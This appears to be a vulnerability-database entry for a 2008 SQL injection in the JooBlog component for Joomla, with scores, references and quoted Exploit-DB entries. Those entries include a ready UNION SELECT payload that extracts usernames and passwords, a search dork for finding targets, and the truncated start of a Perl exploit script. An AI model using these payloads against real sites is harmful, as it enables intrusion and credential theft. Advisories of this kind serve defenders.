CVE-2008-2630
Published 2008-06-10
Priority P3 · 43 · high · 7.5 CVSS 2.0
AV:N/AC:L/Au:N/C:P/I:P/A:P
EXPLOIT
EPSS: 1.02% (59.0th percentile)
SQL injection vulnerability in the JooBlog (com_jb2) component 0.1.1 for Joomla! allows remote attackers to execute arbitrary SQL commands via the CategoryID parameter in a category action to index.php.
Affected
1 ranges
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| joomla | com_jb2 | — | — |
No detection rules found.
Exploit-DB
Joomla! Component JooBlog 0.1.1 - 'PostID' SQL Injection
exploitdb·2008-11-10
CVE-2008-5051 Joomla! Component JooBlog 0.1.1 - 'PostID' SQL Injection
---
#######################################################
Joomla Component com_jb2(PostID) SQL-injetion Vulnerability
#######################################################
###################################################
#[~] Author : boom3rang
#[~] Kosova Hackers Group [www.khg-crew.ws]
#[~] Greetz : H!tm@N, KHG, chs, redc00de, LiTTle-Hack3r, L1RIDON1.
#[!] Module_Name: com_jb2
#[!] Script_Name: Joomla
#[!] Google_Dork: inurl:"option=com_jb2 "PostID"
##################################################
#[~] Example:
http://localhost/Path/index.php?option=com_jb2&PostID=[exploit]
#[~] Exploit:
-9999'/**/UNION/**/SELECT/**/1,unhex(hex(concat(username,0x3a,password))),3,4,5,6,7+from+jos_users/*
##############################
Exploit-DB
Joomla! Component JooBlog 0.1.1 - Blind SQL Injection
exploitdb·2008-06-03
CVE-2008-5051 Joomla! Component JooBlog 0.1.1 - Blind SQL Injection
---
#!/usr/bin/perl
use LWP::UserAgent;
use Getopt::Long;
if(!$ARGV[1])
{
print " \n";
print " #############################################################\n";
print " # Joomla Component JooBlog Blind SQL Injection Exploit #\n";
print " # Author:His0k4 [ALGERIAN HaCkeR] #\n";
print " # #\n";
print " # Conctact: His0k4.hlm[at]gamil.com #\n";
print " # Greetz: All friends & muslims HacKeRs #\n";
print " # Greetz2: http://www.palcastle.org/cc :) #\n";
print " # #\n";
print " # Dork : inurl:com_jb2 #\n";
print " # Usage: perl jooBlog.pl host path #\n";
print " # Example: perl jooBlog.pl www.host.com /joomla/ -c 5 #\n";
print " # #\n";
print " # Options: #\n";
print " # -c Category id #\n";
print " #######################################
No writeups or analysis indexed.
References
http://secunia.com/advisories/30443
http://www.vupen.com/english/advisories/2008/1736/references
https://exchange.xforce.ibmcloud.com/vulnerabilities/42838
https://www.exploit-db.com/exploits/5734
2008-06-10
Published